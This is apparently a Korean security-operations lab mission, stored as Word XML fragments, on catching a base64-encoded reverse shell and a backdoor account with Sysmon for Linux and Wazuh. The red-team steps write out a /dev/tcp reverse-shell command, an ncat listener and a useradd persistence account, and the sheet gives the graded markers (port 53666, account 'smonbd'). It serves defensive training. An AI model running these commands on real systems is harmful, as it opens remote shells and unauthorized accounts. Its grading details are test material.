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[보안운영 W11] 호스트의 비행기록장치 — sysmon이 잡는 '그 순간'(리버스셸·인코딩 명령)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secuops  ·  난이도 hard  ·  유형 1v1  ·  제한 55분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osquery(W7)는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>지금 이 순간</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>의 스냅샷을 찍는다 — 공격이 끝난 뒤 흔적을 지우면 놓친다. 이번 주</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">무기 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Microsoft Sysmon for Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(eBPF 기반)는 다르다. 프로세스가 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>생성되는 순간</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(ProcessCreate — 인코딩된 명령줄까지), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>네트워크 연결</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(NetworkConnect), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>파일 생성</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>(FileCreate)을</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>event stream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>으로 실시간 기록한다. 스냅샷이 놓치는 "그 순간"을 잡는 호스트의 비행기록장치다.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침입자가 ① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>base64로 인코딩한 리버스셸 명령</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>을 실행해 외부 콜백 채널(리스너)을 열고 ② 백도어</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>계정으로 지속성을 확보한다. 운영자(너)는 sysmon을 설치·구성(config.xml RuleGroup)하고, 의심</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>프로세스/연결과 persistence를 잡아 Wazuh로 보낸다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>▸ 모드: solo(호스트 침해 시뮬→sysmon 헌터) / duel(상대 호스트 침해→본인 탐지). 대상=solo 본인 / duel 상대.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>▸ 📋 채점 메모(운영) — 호스트/분석형 미션이라 자동채점이 보수적(partial 상한, AI 채점 ±변동 있음).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">검증 가능한 증거(passwd 신규 계정·Wazuh rule 86601) 인용이 점수의 핵심. 한계는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GRADING-LIMITATIONS.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 참고.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ 알아둘 점 — 이 6v6엔 sysmon이 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>기본 미설치</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>라 BLUE-1에서 설치/구성이 과제다. 탐지 채점은 침해</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">아티팩트로 한다. 마커: 리버스셸 콜백 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>리스너 포트 53666</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, 백도어 계정 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`smonbd`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>(osquery=snapshot, sysmon=event stream의 보완 관계를 서술한다.)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base64 리버스셸 콜백 (ProcessCreate + NetworkConnect)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탐지를 피하려 명령을 base64로 인코딩해 실행하고, 외부로 셸을 되돌릴 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>콜백 리스너</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>를 연다.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sysmon이 있으면 ProcessCreate(인코딩 cmdline)와 NetworkConnect가 그 순간을 기록한다.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대상 호스트에 콜백 리스너 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>포트 53666</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>을 연다(리버스셸 채널 모사).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>echo 'bash -i &gt;&amp; /dev/tcp/10.20.30.202/53666 0&gt;&amp;1' | base64   # payload 모사</w:t>
        <w:br/>
        <w:t>nohup ncat -lk 53666 &gt;/dev/null 2&gt;&amp;1 &amp;                         # 콜백 채널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호스트에서 포트 53666이 listening인지로 채점(sysmon NetworkConnect 표적).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호스트에서 포트 53666이 listening이다.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백도어 계정 persistence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셸은 끊길 수 있으니 더 끈질긴 발판을 만든다 — 백도어 계정. sysmon/Wazuh가 계정 생성·파일 변경을</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>호스트 이벤트로 관측한다.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대상 호스트에 계정 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`smonbd`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>를 만든다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sudo useradd -m -s /bin/bash smonbd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smonbd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>가 추가됐는지로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smonbd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>가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sysmon 설치 + config.xml RuleGroup 구성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이 호스트엔 sysmon이 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>미설치</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">다. sysmon-for-linux(eBPF)를 설치하고 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>config.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>의</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>RuleGroup(Include/Exclude)으로 관측할 Event(ProcessCreate/NetworkConnect/FileCreate)를 정의한다.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Include만 켜면 노이즈가 폭주하니 Exclude로 정상 활동을 거른다.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sysmon을 설치하고 config.xml RuleGroup을 설계한다. 결과는 Wazuh agent가 ship한다(전제 확인).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web 호스트에 Wazuh agent(sysmon 이벤트 ship 주체)가 가동 중인지로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web에 Wazuh agent가 running이다(sysmon→Wazuh ship 경로 준비).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리버스셸 콜백 잡기 (ProcessCreate + NetworkConnect)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RED-1의 리버스셸 콜백(53666)을 호스트 이벤트로 잡는다. sysmon이 있으면 NetworkConnect/ProcessCreate</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">event로, 미설치 상황에선 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/osquery로 비표준 리스너와 그 프로세스를 상관한다.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포트 53666과 그 프로세스를 상관해 콜백 채널의 정체를 규명한다.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 콜백 리스너(53666)가 탐지되는지로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포트 53666이 listening이며 프로세스까지 상관했다.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계정 persistence 잡기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RED-2의 백도어 계정(smonbd)을 호스트 가시화로 잡는다. sysmon FileCreate(/etc/passwd 변경) 또는</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>osquery users로 식별한다.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users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를 질의해 백도어 계정을 찾는다.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>에 백도어 계정(smonbd)이 탐지되는지로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에 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>smonbd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>가 있고 찾아냈다.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sysmon 이벤트를 Wazuh로 (localfile)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sysmon 이벤트를 Wazuh manager로 ship한다. agent의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ossec.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>agent.conf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/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;localfile&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>로</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sysmon 로그를 읽어 manager의 sysmon 룰셋이 매치하게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siem의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ossec.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;localfile&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 수집 설정을 확인하고, sysmon 로그를 어떤 log_format으로</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>수집할지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siem의 ossec.conf에 localfile 설정이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ossec.conf에 localfile 설정이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리버스셸이 SIEM으로 수렴 + 두 도구의 보완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base64 리버스셸 + 계정 persistence의 호스트 이벤트가 Wazuh로 수렴해 경보가 뜨는지 확인한다.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">네트워크 장비가 못 보는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>호스트 내부 행위</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>를 sysmon이 채운다.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본인 SIEM에 호스트 이벤트 경보가 수집되는지 확인하고, osquery(snapshot)와 sysmon(event stream)의</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>보완 관계를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SIEM에 최근 경보가 수집됐는지로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